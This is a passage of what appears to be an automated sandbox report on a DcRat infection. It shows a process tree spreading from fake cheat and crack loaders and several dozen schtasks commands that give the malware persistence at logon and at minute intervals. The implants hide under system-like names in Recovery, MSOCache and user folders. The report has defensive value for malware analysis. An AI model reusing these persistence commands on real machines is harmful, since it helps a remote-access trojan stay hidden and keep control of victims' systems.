C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"13⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2616
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"10⤵PID:2392
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"9⤵
- Executes dropped EXE
PID:2872
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"10⤵PID:2168
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "11⤵
- Loads dropped DLL
PID:2292
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"12⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2388
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"9⤵PID:6436
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"8⤵
- Executes dropped EXE
PID:2520
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"9⤵PID:1660
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "10⤵
- Loads dropped DLL
PID:2396
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"11⤵
- Modifies WinLogon for persistence
- UAC bypass
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:1508
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\uyZu8tDpxN.bat"12⤵PID:2596
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:213⤵PID:3712
-
C:\Users\Public\reviewNet.exe"C:\Users\Public\reviewNet.exe"13⤵PID:4572
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"8⤵PID:5732
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"7⤵
- Executes dropped EXE
PID:1492
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"8⤵PID:2184
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "9⤵
- Loads dropped DLL
PID:1860
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"10⤵
- DcRat
- Modifies WinLogon for persistence
- UAC bypass
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:2248
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\oInhkeZCvT.bat"11⤵PID:5548
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:212⤵PID:1608
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"12⤵
- Suspicious use of AdjustPrivilegeToken
PID:7152
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"7⤵PID:7212
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"6⤵
- Executes dropped EXE
PID:2396
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"7⤵PID:2260
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "8⤵
- Loads dropped DLL
PID:636
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"9⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1960
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"6⤵PID:6276
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2724
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"6⤵PID:3008
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "7⤵
- Loads dropped DLL
PID:880
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"8⤵
- Modifies WinLogon for persistence
- UAC bypass
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:660
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Kn8TuT8p8X.bat"9⤵PID:4572
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:210⤵PID:6852
-
C:\ComsurrogateServerdll\CrackLauncher.exe"C:\ComsurrogateServerdll\CrackLauncher.exe"10⤵PID:4648
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"4⤵
- Executes dropped EXE
PID:2692
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"5⤵PID:3016
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "6⤵
- Loads dropped DLL
PID:2688
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"7⤵
- Modifies WinLogon for persistence
- UAC bypass
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:1040
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Endr4g1tEq.bat"8⤵PID:2140
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:29⤵PID:7144
-
C:\Users\Admin\Desktop\conhost.exe"C:\Users\Admin\Desktop\conhost.exe"9⤵PID:948
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"3⤵
- Executes dropped EXE
PID:2944
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"4⤵PID:2440
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "5⤵
- Loads dropped DLL
PID:2312
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"6⤵
- Modifies WinLogon for persistence
- UAC bypass
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:2636
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\b93nLTpSQp.bat"7⤵PID:6408
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:28⤵PID:6676
-
C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\reviewNet.exe"C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\reviewNet.exe"8⤵PID:5552
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"3⤵PID:4024
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"2⤵
- Executes dropped EXE
PID:2148
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"3⤵PID:2616
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "4⤵
- Loads dropped DLL
PID:2736
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1600
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"2⤵PID:7648
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1406878062102850843-1804211736-1324494858-1767034057-1667410540258605708-2105403979"1⤵PID:2068
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-744146261742772594497901711-1763802217-1597581060-17897338994804635431460189342"1⤵PID:1812
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-857903594135187414-1080223752-1408395248685007522-1248151200-18162985291718858552"1⤵PID:3032
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 5 /tr "'C:\Program Files\Uninstall Information\cmd.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
PID:4304
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncherC" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\CrackLauncher.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
PID:4128
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\conhost.exe'" /f1⤵
- Process spawned unexpected child process
PID:4796
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 7 /tr "'C:\Users\Public\Desktop\conhost.exe'" /f1⤵
- Process spawned unexpected child process
PID:3984
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "reviewNetr" /sc MINUTE /mo 13 /tr "'C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\reviewNet.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4056
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "reviewNet" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\reviewNet.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4844
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Public\Desktop\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3452
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3404
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncher" /sc ONLOGON /tr "'C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\CrackLauncher.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3688
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:3888
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "reviewNetr" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\reviewNet.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:3500
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\Users\Public\Desktop\conhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3256
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 13 /tr "'C:\Program Files\Uninstall Information\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4036
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncherC" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\CrackLauncher.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:4292
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\conhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
PID:3472
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5132
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 5 /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\wscript.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
PID:5156
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:5168
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "reviewNetr" /sc MINUTE /mo 5 /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\reviewNet.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5192
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\wscript.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
PID:5232
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 13 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:5240
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "reviewNet" /sc ONLOGON /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\reviewNet.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:5252
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 6 /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\wscript.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
PID:5340
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 12 /tr "'C:\ComsurrogateServerdll\wscript.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
PID:5348
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "reviewNetr" /sc MINUTE /mo 6 /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\reviewNet.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:5356
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\ComsurrogateServerdll\wscript.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:5400
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\conhost.exe'" /f1⤵
- Process spawned unexpected child process
PID:5424
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 7 /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\cmd.exe'" /f1⤵
- Process spawned unexpected child process
PID:5464
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 10 /tr "'C:\ComsurrogateServerdll\wscript.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:5488
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Default User\conhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
PID:5496
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\cmd.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5532
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5576
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 7 /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\cmd.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
PID:5616
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncherC" /sc MINUTE /mo 10 /tr "'C:\ComsurrogateServerdll\CrackLauncher.exe'" /f1⤵
- Process spawned unexpected child process
PID:5680
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncher" /sc ONLOGON /tr "'C:\ComsurrogateServerdll\CrackLauncher.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:5780
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 12 /tr "'C:\Windows\AppPatch\cmd.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5816
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 6 /tr "'C:\Users\Admin\Videos\cmd.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5836
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "audiodga" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\audiodg.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
PID:5848
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Windows\AppPatch\cmd.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5916
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\audiodg.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:5936
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncherC" /sc MINUTE /mo 9 /tr "'C:\ComsurrogateServerdll\CrackLauncher.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5944
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Users\Admin\Videos\cmd.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
PID:5952
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\Videos\cmd.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5984
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "audiodga" /sc MINUTE /mo 13 /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\audiodg.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:5992
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 7 /tr "'C:\Windows\AppPatch\cmd.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
PID:6004
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 5 /tr "'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\WmiPrvSE.exe'" /f1⤵
- DcRat
PID:6108
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncherC" /sc MINUTE /mo 13 /tr "'C:\Windows\Fonts\CrackLauncher.exe'" /f1⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:6116
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "reviewNetr" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Internet Explorer\de-DE\reviewNet.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6132
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "reviewNetr" /sc MINUTE /mo 7 /tr "'C:\Users\Public\reviewNet.exe'" /f1⤵PID:5148
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "reviewNet" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\de-DE\reviewNet.exe'" /rl HIGHEST /f1⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:5204
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncher" /sc ONLOGON /tr "'C:\Windows\Fonts\CrackLauncher.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5176
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- DcRat
PID:5316
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "reviewNet" /sc ONLOGON /tr "'C:\Users\Public\reviewNet.exe'" /rl HIGHEST /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:5280
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "reviewNetr" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Internet Explorer\de-DE\reviewNet.exe'" /rl HIGHEST /f1⤵PID:5296
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncherC" /sc MINUTE /mo 13 /tr "'C:\Windows\Fonts\CrackLauncher.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:5328
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "reviewNetr" /sc MINUTE /mo 12 /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\reviewNet.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
PID:3048
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "reviewNetr" /sc MINUTE /mo 11 /tr "'C:\Users\Public\reviewNet.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:3952
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 6 /tr "'C:\ComsurrogateServerdll\wscript.exe'" /f1⤵PID:5384
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\WmiPrvSE.exe'" /rl HIGHEST /f1⤵PID:4208
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "reviewNet" /sc ONLOGON /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\reviewNet.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:768
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\ComsurrogateServerdll\conhost.exe'" /f1⤵
- Process spawned unexpected child process
PID:2624
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\ComsurrogateServerdll\wscript.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:3120
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "reviewNetr" /sc MINUTE /mo 6 /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\reviewNet.exe'" /rl HIGHEST /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:4076
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\ComsurrogateServerdll\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:4084
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 10 /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\wscript.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
PID:2728
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 13 /tr "'C:\ComsurrogateServerdll\wscript.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:3308
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\wscript.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3332
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\ComsurrogateServerdll\conhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
PID:3156
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\wscript.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:2616
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncherC" /sc MINUTE /mo 8 /tr "'C:\Users\Admin\Pictures\CrackLauncher.exe'" /f1⤵PID:5688
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\wscript.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5760
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 12 /tr "'C:\Users\Public\Documents\My Pictures\cmd.exe'" /f1⤵PID:5552
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 12 /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\wscript.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5884
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncher" /sc ONLOGON /tr "'C:\Users\Admin\Pictures\CrackLauncher.exe'" /rl HIGHEST /f1⤵PID:5912
-
